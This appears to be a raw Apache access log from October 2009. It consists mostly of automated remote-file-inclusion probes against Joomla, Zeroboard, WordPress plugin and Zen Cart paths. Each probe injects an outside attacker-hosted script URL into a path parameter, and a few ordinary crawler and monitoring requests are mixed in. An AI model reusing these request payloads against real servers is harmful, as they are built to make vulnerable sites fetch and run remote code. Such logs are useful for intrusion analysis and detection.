72.11.145.8 - - [17/Oct/2009:04:02:52 -0400] "GET /logs/access_log.Q109070300//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:04:02:53 -0400] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:04:02:53 -0400] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:04:02:59 -0400] "GET /logs/error_log.Q109090400//include/admin.lib.inc.php?site_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:04:02:59 -0400] "GET //include/admin.lib.inc.php?site_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:04:02:59 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
59.24.49.35 - - [17/Oct/2009:04:03:03 -0400] "GET /logs//bbs///skin/ggambo7002_gallery/zboard.php?dir=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
59.24.49.35 - - [17/Oct/2009:04:03:03 -0400] "GET /logs/access_log.Q109090800%20%20//bbs///skin/ggambo7002_gallery/zboard.php?dir=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:04:03:04 -0400] "GET /logs/access_log.Q109090400//include/admin.lib.inc.php?site_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
59.24.49.35 - - [17/Oct/2009:04:03:05 -0400] "GET //bbs///skin/ggambo7002_gallery/zboard.php?dir=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:04:03:05 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:04:03:05 -0400] "GET //include/admin.lib.inc.php?site_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:04:03:05 -0400] "GET /logs/error_log.Q109090400//include/admin.lib.inc.php?site_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:04:03:10 -0400] "GET /logs/access_log.Q109090400//include/admin.lib.inc.php?site_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:04:03:15 -0400] "GET //include/admin.lib.inc.php?site_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:04:03:15 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:04:03:15 -0400] "GET /logs/error_log.Q109090400%20%20//include/admin.lib.inc.php?site_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:04:03:15 -0400] "GET /logs/access_log.Q109090400%20%20//include/admin.lib.inc.php?site_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:04:03:17 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:04:03:17 -0400] "GET /logs/error_log.Q109090400//include/admin.lib.inc.php?site_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:04:03:19 -0400] "GET /logs/error_log.Q109090400%20%20//include/admin.lib.inc.php?site_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:04:03:19 -0400] "GET //include/admin.lib.inc.php?site_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:04:03:19 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:04:03:19 -0400] "GET /logs/access_log.Q109090400%20%20//include/admin.lib.inc.php?site_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:04:03:22 -0400] "GET //include/admin.lib.inc.php?site_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:04:03:27 -0400] "GET /logs/error_log.Q109090400//include/admin.lib.inc.php?site_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:04:03:34 -0400] "GET //include/admin.lib.inc.php?site_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:04:03:41 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:04:03:41 -0400] "GET /logs/error_log.Q109090400%20%20//include/admin.lib.inc.php?site_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:04:03:41 -0400] "GET //include/admin.lib.inc.php?site_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:04:03:42 -0400] "GET /logs/access_log.Q109090400%20%20//include/admin.lib.inc.php?site_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:04:03:42 -0400] "GET /logs/access_log.Q109090400//include/admin.lib.inc.php?site_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
59.24.49.35 - - [17/Oct/2009:04:03:43 -0400] "GET /logs/access_log.Q109090500%20%20//bbs///skin/ggambo7002_gallery/zboard.php?dir=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:04:03:46 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:04:03:46 -0400] "GET /logs/access_log.Q109090400//include/admin.lib.inc.php?site_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
59.24.49.35 - - [17/Oct/2009:04:04:18 -0400] "GET //bbs///skin/ggambo7002_gallery/zboard.php?dir=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
59.24.49.35 - - [17/Oct/2009:04:04:18 -0400] "GET /logs/access_log.Q109090800%20%20//bbs///skin/ggambo7002_gallery/zboard.php?dir=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
59.24.49.35 - - [17/Oct/2009:04:04:18 -0400] "GET /logs//bbs///skin/ggambo7002_gallery/zboard.php?dir=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
72.30.78.230 - - [17/Oct/2009:04:04:20 -0400] "GET /logs/error_log.Q109032500 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
95.211.6.161 - - [17/Oct/2009:04:04:22 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:04:04:22 -0400] "GET /logs/access_log.Q109072900%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:04:04:22 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:04:04:27 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:04:04:27 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:04:04:27 -0400] "GET /logs/access_log.Q109072900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:04:04:30 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:04:04:30 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:04:04:30 -0400] "GET /logs/access_log.Q109072900%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:04:04:33 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:04:04:33 -0400] "GET /logs/access_log.Q109072900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:04:04:33 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:04:04:43 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:04:04:43 -0400] "GET //include/admin.lib.inc.php?site_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:04:04:43 -0400] "GET /logs/access_log.Q109091600//include/admin.lib.inc.php?site_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
59.24.49.35 - - [17/Oct/2009:04:04:44 -0400] "GET /logs/access_log.Q109090500%20%20//bbs///skin/ggambo7002_gallery/zboard.php?dir=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:04:04:52 -0400] "GET //include/admin.lib.inc.php?site_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:04:04:52 -0400] "GET /logs/access_log.Q109091600//include/admin.lib.inc.php?site_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:04:04:52 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:04:05:01 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:04:05:01 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:04:05:01 -0400] "GET /logs/access_log.Q109063000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:04:05:06 -0400] "GET /logs/access_log.Q109052000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:04:05:07 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:04:05:07 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:04:05:07 -0400] "GET /logs/access_log.Q109063000%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:04:05:07 -0400] "GET /logs/access_log.Q109090300//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:04:05:11 -0400] "GET /logs/access_log.Q109090300//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:04:05:11 -0400] "GET /logs/access_log.Q109052000%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:04:05:13 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:04:05:13 -0400] "GET /logs/access_log.Q109063000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:04:05:13 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:04:05:17 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:04:05:17 -0400] "GET /logs/access_log.Q109091600%20%20//include/admin.lib.inc.php?site_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:04:05:17 -0400] "GET //include/admin.lib.inc.php?site_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:04:05:20 -0400] "GET /logs/access_log.Q109052000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:04:05:21 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:04:05:21 -0400] "GET //include/admin.lib.inc.php?site_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:04:05:21 -0400] "GET /logs/access_log.Q109091600%20%20//include/admin.lib.inc.php?site_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:04:05:22 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:04:05:22 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:04:05:22 -0400] "GET /logs/access_log.Q109063000%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:04:05:23 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:04:05:23 -0400] "GET /logs/access_log.Q109063000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:04:05:23 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:04:05:24 -0400] "GET /logs/access_log.Q109052000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:04:05:28 -0400] "GET /logs/access_log.Q109052000%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:04:05:30 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:04:05:30 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:04:05:30 -0400] "GET /logs/access_log.Q109063000%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:04:05:31 -0400] "GET /logs/access_log.Q109052000%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
59.24.49.35 - - [17/Oct/2009:04:05:43 -0400] "GET /logs/access_log.Q109090800//bbs///skin/ggambo7002_gallery/zboard.php?dir=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:04:05:44 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:04:05:44 -0400] "GET /logs/access_log.Q109051500//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:04:05:48 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:04:05:51 -0400] "GET /logs/access_log.Q109051700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
59.24.49.35 - - [17/Oct/2009:04:05:56 -0400] "GET /logs/access_log.Q109081700//bbs///skin/ggambo7002_gallery/zboard.php?dir=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:04:06:48 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
98.154.49.238 - - [17/Oct/2009:04:07:08 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "http://sn106w.snt106.mail.live.com/mail/InboxLight.aspx?n=1449450984" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
218.27.203.107 - - [17/Oct/2009:04:07:12 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:04:07:12 -0400] "GET /logs/access_log.Q109063000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:04:07:15 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
59.24.49.35 - - [17/Oct/2009:04:07:17 -0400] "GET /logs/access_log.Q109090800//bbs///skin/ggambo7002_gallery/zboard.php?dir=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
59.24.49.35 - - [17/Oct/2009:04:07:18 -0400] "GET /logs/access_log.Q109081700//bbs///skin/ggambo7002_gallery/zboard.php?dir=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:04:07:34 -0400] "GET /logs/access_log.Q109052000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
209.97.212.185 - - [17/Oct/2009:04:07:34 -0400] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.97.212.185 - - [17/Oct/2009:04:07:34 -0400] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
209.97.212.185 - - [17/Oct/2009:04:07:34 -0400] "GET /logs/access_log.Q109092200%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
209.97.212.185 - - [17/Oct/2009:04:07:35 -0400] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.97.212.185 - - [17/Oct/2009:04:07:35 -0400] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
209.97.212.185 - - [17/Oct/2009:04:07:35 -0400] "GET /logs/access_log.Q109092200//skins/advanced/advanced1.php?pluginpath[0]=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:04:07:42 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:04:07:42 -0400] "GET /logs/access_log.Q109063000%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:04:07:42 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:04:07:59 -0400] "GET /logs/access_log.Q109052000%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
174.133.148.98 - - [17/Oct/2009:04:08:03 -0400] "GET /logs/access_log.Q109080200//?_SERVER[DOCUMENT_ROOT]=http://n34.biz/.injek/kontol.txt???? HTTP/1.1" 404 226 "-" "libwww-perl/5.814"
174.133.148.98 - - [17/Oct/2009:04:08:03 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://n34.biz/.injek/kontol.txt???? HTTP/1.1" 200 452 "-" "libwww-perl/5.814"
174.133.148.98 - - [17/Oct/2009:04:08:03 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://n34.biz/.injek/kontol.txt???? HTTP/1.1" 200 22193 "-" "libwww-perl/5.814"
174.133.148.98 - - [17/Oct/2009:04:08:17 -0400] "GET /logs/access_log.Q109071000//?_SERVER[DOCUMENT_ROOT]=http://n34.biz/.injek/kontol.txt???? HTTP/1.1" 404 226 "-" "libwww-perl/5.814"
209.97.212.185 - - [17/Oct/2009:04:09:06 -0400] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
209.97.212.185 - - [17/Oct/2009:04:09:06 -0400] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.97.212.185 - - [17/Oct/2009:04:09:06 -0400] "GET /logs/access_log.Q109092200//skins/advanced/advanced1.php?pluginpath[0]=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
209.97.212.185 - - [17/Oct/2009:04:10:20 -0400] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
209.97.212.185 - - [17/Oct/2009:04:10:20 -0400] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
